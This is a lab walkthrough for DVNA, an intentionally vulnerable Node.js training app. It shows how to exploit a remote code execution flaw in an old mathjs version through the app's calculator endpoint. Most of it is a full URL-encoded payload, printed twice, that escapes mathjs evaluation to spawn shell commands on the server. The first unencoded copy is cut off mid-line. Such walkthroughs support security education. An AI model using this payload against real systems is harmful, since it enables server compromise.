Using Components with Known Vulnerabilities - DVNA

Using Components with Known Vulnerabilities

mathjs Remote Code Execution

The version of mathjs(https://www.npmjs.com/package/mathjs) library used in the application has a remote code execution vulnerability that allows an attacker to run arbitrary code on the server.

The calculator implementation uses mathjs.eval to evaluate user input at

http://192.168.56.101:9090/app/calc

Step 1: Login to the application and navigate to /app/calc. Notice that there is a simple calculator functionality

Step 2: Enter some math expression such as 2+4 and press enter. Intercept this request using Burp

Step 3: Send the intercepted request to Burp Repeater(CTRL+R) and navigate to repeater(CTRL+SHIFT+R)

Step 4: Forward the request and notice that the expression is evaluated and application returns a HTTP 200 response

There is no input validation either, probably because it is going to be a maths equation which will contain symbols

Step 5: Modify the value of eqn in the POST request body to cos.constructor("spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = f

OR

cos.constructor%28%22spawn_sync+%3D+process.binding%28%27spawn_sync%27%29%3B+normalizeSpawnArguments+%3D+function%28c%2Cb%2Ca%29%7Bif%28Array.isArray%28b%29%3Fb%3Db.slice%280%29%3A%28a%3Db%2Cb%3D%5B%5D%29%2Ca%3D%3D%3Dundefined%26%26%28a%3D%7B%7D%29%2Ca%3DObject.assign%28%7B%7D%2Ca%29%2Ca.shell%29%7Bconst+g%3D%5Bc%5D.concat%28b%29.join%28%27+%27%29%3Btypeof+a.shell%3D%3D%3D%27string%27%3Fc%3Da.shell%3Ac%3D%27%2Fbin%2Fsh%27%2Cb%3D%5B%27-c%27%2Cg%5D%3B%7Dtypeof+a.argv0%3D%3D%3D%27string%27%3Fb.unshift%28a.argv0%29%3Ab.unshift%28c%29%3Bvar+d%3Da.env%7C%7Cprocess.env%3Bvar+e%3D%5B%5D%3Bfor%28var+f+in+d%29e.push%28f%2B%27%3D%27%2Bd%5Bf%5D%29%3Breturn%7Bfile%3Ac%2Cargs%3Ab%2Coptions%3Aa%2CenvPairs%3Ae%7D%3B%7D%3BspawnSync+%3D+function%28%29%7Bvar+d%3DnormalizeSpawnArguments.apply%28null%2Carguments%29%3Bvar+a%3Dd.options%3Bvar+c%3Bif%28a.file%3Dd.file%2Ca.args%3Dd.args%2Ca.envPairs%3Dd.envPairs%2Ca.stdio%3D%5B%7Btype%3A%27pipe%27%2Creadable%3A%210%2Cwritable%3A%211%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%5D%2Ca.input%29%7Bvar+g%3Da.stdio%5B0%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5B0%5D%29%3Bg.input%3Da.input%3B%7Dfor%28c%3D0%3Bc%3Ca.stdio.length%3Bc%2B%2B%29%7Bvar+e%3Da.stdio%5Bc%5D%26%26a.stdio%5Bc%5D.input%3Bif%28e%21%3Dnull%29%7Bvar+f%3Da.stdio%5Bc%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5Bc%5D%29%3BisUint8Array%28e%29%3Ff.input%3De%3Af.input%3DBuffer.from%28e%2Ca.encoding%29%3B%7D%7Dconsole.log%28a%29%3Bvar+b%3Dspawn_sync.spawn%28a%29%3Bif%28b.output%26%26a.encoding%26%26a.encoding%21%3D%3D%27buffer%27%29for%28c%3D0%3Bc%3Cb.output.length%3Bc%2B%2B%29%7Bif%28%21b.output%5Bc%5D%29continue%3Bb.output%5Bc%5D%3Db.output%5Bc%5D.toString%28a.encoding%29%3B%7Dreturn+b.stdout%3Db.output%26%26b.output%5B1%5D%2Cb.stderr%3Db.output%26%26b.output%5B2%5D%2Cb.error%26%26%28b.error%3D+b.error+%2B+%27spawnSync+%27%2Bd.file%2Cb.error.path%3Dd.file%2Cb.error.spawnargs%3Dd.args.slice%281%29%29%2Cb%3B%7D%22%29%28%29%3Bcos.constructor%28%22return+spawnSync%28%27id%27%29.output%5B1%5D%22%29%28%29.

cos.constructor%28%22spawn_sync+%3D+process.binding%28%27spawn_sync%27%29%3B+normalizeSpawnArguments+%3D+function%28c%2Cb%2Ca%29%7Bif%28Array.isArray%28b%29%3Fb%3Db.slice%280%29%3A%28a%3Db%2Cb%3D%5B%5D%29%2Ca%3D%3D%3Dundefined%26%26%28a%3D%7B%7D%29%2Ca%3DObject.assign%28%7B%7D%2Ca%29%2Ca.shell%29%7Bconst+g%3D%5Bc%5D.concat%28b%29.join%28%27+%27%29%3Btypeof+a.shell%3D%3D%3D%27string%27%3Fc%3Da.shell%3Ac%3D%27%2Fbin%2Fsh%27%2Cb%3D%5B%27-c%27%2Cg%5D%3B%7Dtypeof+a.argv0%3D%3D%3D%27string%27%3Fb.unshift%28a.argv0%29%3Ab.unshift%28c%29%3Bvar+d%3Da.env%7C%7Cprocess.env%3Bvar+e%3D%5B%5D%3Bfor%28var+f+in+d%29e.push%28f%2B%27%3D%27%2Bd%5Bf%5D%29%3Breturn%7Bfile%3Ac%2Cargs%3Ab%2Coptions%3Aa%2CenvPairs%3Ae%7D%3B%7D%3BspawnSync+%3D+function%28%29%7Bvar+d%3DnormalizeSpawnArguments.apply%28null%2Carguments%29%3Bvar+a%3Dd.options%3Bvar+c%3Bif%28a.file%3Dd.file%2Ca.args%3Dd.args%2Ca.envPairs%3Dd.envPairs%2Ca.stdio%3D%5B%7Btype%3A%27pipe%27%2Creadable%3A%210%2Cwritable%3A%211%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%2C%7Btype%3A%27pipe%27%2Creadable%3A%211%2Cwritable%3A%210%7D%5D%2Ca.input%29%7Bvar+g%3Da.stdio%5B0%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5B0%5D%29%3Bg.input%3Da.input%3B%7Dfor%28c%3D0%3Bc%3Ca.stdio.length%3Bc%2B%2B%29%7Bvar+e%3Da.stdio%5Bc%5D%26%26a.stdio%5Bc%5D.input%3Bif%28e%21%3Dnull%29%7Bvar+f%3Da.stdio%5Bc%5D%3Dutil._extend%28%7B%7D%2Ca.stdio%5Bc%5D%29%3BisUint8Array%28e%29%3Ff.input%3De%3Af.input%3DBuffer.from%28e%2Ca.encoding%29%3B%7D%7Dconsole.log%28a%29%3Bvar+b%3Dspawn_sync.spawn%28a%29%3Bif%28b.output%26%26a.encoding%26%26a.encoding%21%3D%3D%27buffer%27%29for%28c%3D0%3Bc%3Cb.output.length%3Bc%2B%2B%29%7Bif%28%21b.output%5Bc%5D%29continue%3Bb.output%5Bc%5D%3Db.output%5Bc%5D.toString%28a.encoding%29%3B%7Dreturn+b.stdout%3Db.output%26%26b.output%5B1%5D%2Cb.stderr%3Db.output%26%26b.output%5B2%5D%2Cb.error%26%26%28b.error%3D+b.error+%2B+%27spawnSync+%27%2Bd.file%2Cb.error.path%3Dd.file%2Cb.error.spawnargs%3Dd.args.slice%281%29%29%2Cb%3B%7D%22%29%28%29%3Bcos.constructor%28%22return+spawnSync%28%27id%27%29.output%5B1%5D%22%29%28%29.

Forward the request and notice that the response is a has the output of id command executed on the remote server